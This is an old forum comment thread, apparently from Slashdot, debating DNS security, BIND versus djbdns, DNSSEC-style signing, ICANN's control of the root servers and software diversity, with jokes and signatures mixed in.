So the best solution is not to base any authentication on DNS names at all. (Then there's hardly any need for DNSSEC either.) Of course, quite a few Internet users rely heavily on the non-existent DNS security. They fetch mail using unencrypted POP3, use HTTP-based mail solutions, and so on, and if someone is able to redirect their connections as a consequence of DNS spoofing, he can obtain their passwords pretty easily. But reasonable secure solutions (e.g. TLS and server certificates) already exist.
100 Gb hard disks are cheap nowadays, and almost all OS support > 2Gb files. So securing the DNS from the roots up is simple : have a local /etc/hosts file with all existing hosts.
/etc/hosts file up to date.
Then, subscribe to a mailing list that sends daily changes, so that you can keep your
Ehm... yeah. You first have to secure mail to do this.
{{.sig}}
Use BIND 9! A new security hole is discovered in BIND 4 and BIND 8 every couple of months. The quality of the BIND 8 code is so poor, that a complete rewrite was needed for BIND 9. Consequently, BIND 9 is much less likely than BIND 8 to throw up new security holes.
The story can be found here. The differences between BIND 8 and BIND 9 are highlighted in this quote:
"The basic sleazeware produced in a drunken fury by a bunch of U C Berkeley grad students was still at the core of BIND", according to Paul Vixie, BIND9 architect. This rickety software structure was not judged an adequate basis for the complex changes needed by DDNS and DNSSec, so a decision was made to completely rewrite bind. In 1998, Jerry Scharf, who was the Executive Director of ISC, convinced the remaining UNIX vendors and a few government agencies that the only way to support all of the new DNS protocol enhancements was to totally rewrite BIND. As a result, in August of 1998 DARPA awarded a contract to TIS (NAI labs) to write the software in collaboration with ISC.
Would a (D)DOS attack be better off trying to hit the .com server(s)?
.com servers is going to be far more "useful" than an attack on the root servers - after all, the root servers are hardly ever used (OK, the entry for Vanuatu (.NH?) might not be in your (or your ISPs) cache, so you may be successful in taking that out - but you can be pretty sure .com TLD is in your cache, so you're not going to see any results with an attack on the root servers. But an attack on the .com server will be of more use, in that you won't be able to access domains that aren't in your cache (such as kava.com) - but agian you'll still have access to ones that are (e.g. yahoo.com)
I'm behind a proxy, so I can't find out how many servers there are at present - but I bet it's less than 13.
In addition, an attack on the
"Making linux GPL was the best thing I ever did" - Torvalds. I'd hate to see the worst thing...
Note that one should not confuse this article with DNSSEC, which also talks about securing DNS. DNSSEC (As described in RFC2535 and followups) describes the securing of DNS to give authentic and integrity within DNS. It does not imply DDOS attack resolving, as describe here.
"...From The Roots Up"?
C'mon Timothy, everyone knows that in computer science trees grow from the root DOWN.
Seesh.
(Yes, this is a lame attempt at humor...)
n/t
We're talking about labels, IP's and conical names...standard host file format. Impossible to do this in 15 chars and still make it work for rational use (this would be nice to have in a database as well...wonder what size we're looking at in SQL). Uncompressed so you can read it when DNS dies. Not my problem if you don't have an app that will read large text files :) This is an exercise, so bend a little, ok?
:)
I'm seeing a minimum 1500 chars per page to a max of 3000...forty lines of text...minimum 40 chars. (40 X 40 as an example). And this works out to an average of perhaps 4000 bytes. That makes my 30% 'page' usage figure a bit low...I'll double it and state that we would need 500 CD-R's for each ten million domains.
According to DomainStats.com:
http://www.domainstats.com/
...there are currently 36,148,270 registered domains.
3.6 times 500 = 1,800 CD-Rs. I'll say 1500 ~ 2000 CD-R's to hold a hosts.txt file that contains all currently registered domains worldwide. Roughly 1000 gb's....ten 100 gb drives. No sweat....I'll have them online by EOY. Now all I need is a small script to write out every DNS it can sniff and we're gold
Do not use microsoft products
ICANN would like to replace the root DNS systems with secured servers.
Step 1) install XP.
Step 2) Activate Raw Sockets
Step 3) Give everyone the IP address 0.0.0.0
Step 4) Shut the machine off.
It is now secure.
If it is not on fire, it is a software problem.
Screw it, I've given up DNS. I just sit there with the list and resolve the addresses myself.
Poorly edited, poorly written. What was his conclusion anyway? Maybe I'm looking for too many technical details, but ending with "diversity improves security" implies that the solution is simply to replace *some* BIND servers with other servers. Yeah, that should work. Duh.
He went on to argue that "most security holes are due to buggy software. All the cryptography in the world is not going to change the buggy software problem."
In my experience, most security holes are caused by careless or ignorant users. Even if you take all the bugs out of all the software, there are still going to be security holes. Its like the locked doors at work: secure entrances are pointless if you hold the door open for the guy behind you (and you don't know the guy behind you).
The Daily Build
DNS is the lifeblood of the current internet architecture and it's how hosts find each other, critical for communication.
My first question would be, does this new architecture enable a more discriminatory type of control which would regulate how information is routed, as well as who it gets routed to?
dynamicIP addresses can use a dyndns service, which would mean the security issue on the host is resolved, though securing an adsl connection brings other security issues, and the dynamicDNS service would still be vulnerable to ddos attacks.it's quite funny actually. DJB has gained so much by creating qmail that when he released djbdns, users blindly followed into it expecting it to be void of security holes.
the biggest problems with DNS on the internet have NOTHING to do with the software used. the protocol itself is quite insecure- and what's worse is that this isn't news!
one thing that certainly needs to change is this silly concept of recursive-resolvers; they change the responses, and thus it's next to impossible to determine which is the "Real" resolver.
thanks to sequence prediction, and because DNS servers/clients don't have any "other" protection, it's quite trivial to smash or alter someone's dns tables (during a zone transfer), or redirect users someplace else (when doing recursion).
what we need is a cryptographic method of "signing" requests. root nameservers should maintain keys in addition to NS rrs. And what bind calls "root hints" should contain the keys of the root nameservers. this way, we can digitally sign responses so that their authenticity can be verified. moreover, if packet-space is limited (and even though a "most" queries should have a hundread or three bytes free) we could always just store a hash of the signature. but that's getting too far into implimentation.
the basic droll is that we need something BETTER than dns... not just new software, but a new design...
and plus, by implimenting crypto into the name services, we'll be able to finally keep the french off the internet.
(for those of you lacking any kind of crypto-political background: the french aren't allowed ANY cryptography.... and you thought US export control was bad!)
The officials that kept postponing the emmy awards. Self-important people that believe they have to be at the center of terrorist plans, because _everyone_ knows how important they are.
Maybe we need 4 or 5 independent "root" zones, completely autonomous from each other, if this is such a real problem. Sure, you'd wake up one morning and dotcom/net/org might not work, but quite a few others would. If we did that though, ICANN couldn't remain the heavy-handed tyrant that they are, now could they? With all these liberal definitions of terrorism floating around, it might be possible to say with a straight face, that the only dns terrorists out there sit on the board of ICANN.
The biggest hurtle to implementing such a system is the learning curve for the cryptographic APIs for the languages I'd want to use. There is not a wealth of information on such APIs to begin with. The next biggest hurtle, of course, being that if it were developed inside the US, it'd probably be considered an act of terrorism to ship it outside the US.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
djbdns (and qmail, etc) are NOT under a restrictive license as you like to argue. In fact, they are under no license. DJB simply doesn't believe that software licenses are valid, so he doesn't grant one. His "license" page that you refer to simply reiterates his right of first distribution, as well as waiving some of his right to first distribution under certain circumstances. Read this for more background on why DJB doesn't issue licenses.
The only appearance of the word license on that page is in a quote from a RedHat employee, not DJB. It would seem impossible to me to grant a license without specifically stating that you are granting a license.
The inability to change pathnames is a bunch of hooey. I've seen packages included with a major distribution that could have been modified to use paths that make more sense, but have been packaged with the author's defaults instead.
xjosh
Seriously, though, that works well when you've got one box sitting out there, but a lot of services install round robin DNS with multiple servers for load balancing. Try "dig yahoo.com" or lycos or google, for example. Socks3 here at work consists of about 9 servers, only three of which seem to work with any reliability.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Here's one for 'ya: don't run named as root! The past several versions allow named to switch to an alternate user once the binding to port 53 is complete. In fact, most distributions now come with that enabled by default.
There's no excuse for sloppy administration.
The link above is a site that has been known to often send people to goatse.cx.
-no broken link
What a bunch of slanderous HORSESHIT.
Yes, I believe you are oversimplifying. The issue at stake is not to find the gizmo rel.3 fix which will allow a perfectly technical solution. The real problem is political: the US is unwilling to relinquish control of the root servers to anybody but ICANN, a corporation which is still under tight DoC control, but is supposed to govern the planetary Internet. Did I hear "There the Americans go again.."? Right, they do. Until such a moment when a full international organisation, acting by a charter agreed upon by regional world (which is indeed slightly bigger than Texas + Washington and NY)representatives, takes control of the root servers, a practical solution is very hard to achieve. The 'nice pot of money' for domain names currently goes into: - first and foremost, commercial registrars' balance sheet; - lavish pay of ICANN officers. Not to ruggedized RAID DNS servers...
Thufir Hawat
Part-time Mentat
- MAC is a huge kludge. It is used to enforce read/write restrictions on
/etc and such in TOS. Why not just use ACLs and be done with it?
- I can tell you that it is 99% likely that a root user at any MAC label can most likely compromise the system. It is just too hard to lock down root.
- Privileges are a joke. Most setuid root programs need both setuid root plus a load of privileges in Trusted Solaris, in order to function properly. How do you make
/usr/bin/passwd work without giving the executable write access to /etc/passwd? Well, that just means that if you can exploit /usr/bin/passwd (as you could do with several linker, libc/locale, and other exploits) you can 0wn the system. Just like under Solaris.
- Most of the features in a B1 TOS like TSol are designed just to get the B1 rating. But in order to make the system usable, many "features" (like telnetd,
/usr/bin/passwd, and such) are added which effectively compromise the security of the system and defeat the purpose.
- The vast majority of Internet sites would not benefit from information flow control. It is bloat at best.
Looking at TSol, I at first got a false sense of security. But then I realized that there were a lot of failure modes to think about. They're just different vulnerabilities, not necessarily fewer. All they've got going for them is security through obscurity, and that won't stand if a lot of people start using the system.~wally
So for some of you wizards so bored you area about to *gasp* watch TV....
Wouldnt DNS be the ultimate peer-to-peer application?
Send valuable ideas, donations and flames to;
Thrazzle@yahoo.com
Why doesn't Google come up with a way to do DNS? I mean, people already go there to search for stuff.
Besides, DNS servers need to be decentralized. ICANN is the single point of failure. Do a complete decentralization, have a faster propagation theme (ala Gnutella if you like)...
Something along those lines...
DNS should not "belong" to any one entity. If 30% of the net falls off due to DNS attacks, the other 70% should be able to keep right on ticking.
The whole thing should be automated and dynamic.
Heck, there should not even be an ICANN.
Let's say I register my domain name, then get my IP from my lovely web host, and put a text file (xml or otherwise) on my root directory (like "dns.xml"), and go to google to notify them, then they handle the propagation. This is kind of what UDDI is supposed to do.
Also, the browsers should not only cache the IP of web pages they go to, but be able to automatically check these against some server during idle time (god knows there's idle time on my pc).
"Piter, too, is dead."
I like that they mentioned that diversity results in more security (at the very end of the article). This is one of the major problems with Microsoft products: they only make two operating systems, so when a bug is found in one or both of them, the whole world goes down from some email script virus that a child can write. Under the alternative Linux and BSDs, there are differences between the distributions and even between installations, resulting in big headaches for would-be virus writers. (Sure, this also results in headaches for developers, but who said that making software is easy? Yeah, developing is allegedly "easy" under Microsoft platforms, potentially saving your business big dollars in R&D, but that money gets thrown away on the inevitable repairs necessary after some k1ddy in Congo or something manages to deploy a virus.)
So, like the article says, diversity improves security. In my opinion, each site should choose the best system for the job and configure it to do that job well. If you end up with 10 different platforms and operating systems, so be it.
Oh well.
Oh yeah, so what I was trying to say is that not only the operating system, but also the software running on it, should be diverse and come from as many different sources as possible. I would even say that if you run several machines that perform the same job, perform that job with different software on the several machines. This way, when one gets cracked, the others continue to work (at least for a while).
I don't think so. As faulty as BIND is, I sure as hell don't want to rely on the limited resources available to a single vendor - which just so happens to own the software that controls DNS all over the world.
Uh uh. Save that crap for some alternate universe.
Max
My god carries a hammer. Your god died nailed to a tree. Any questions?
My uptimes for Linux are controlled strictly by the power company :( As long as you disable unneeded services (just about all of them) and block all incoming stuff through firewall rules, you shouldn't have a problem.